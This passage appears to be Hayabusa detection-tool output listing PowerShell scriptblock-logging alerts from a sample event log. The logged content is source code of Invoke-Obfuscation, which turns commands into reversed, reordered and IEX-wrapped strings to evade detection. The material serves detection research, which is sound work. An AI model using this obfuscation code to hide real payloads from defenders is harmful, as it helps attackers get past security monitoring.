($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both <varname> and <variable:varname> syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. $SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both <varname> and <variable:varname> syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. $SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.250 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = 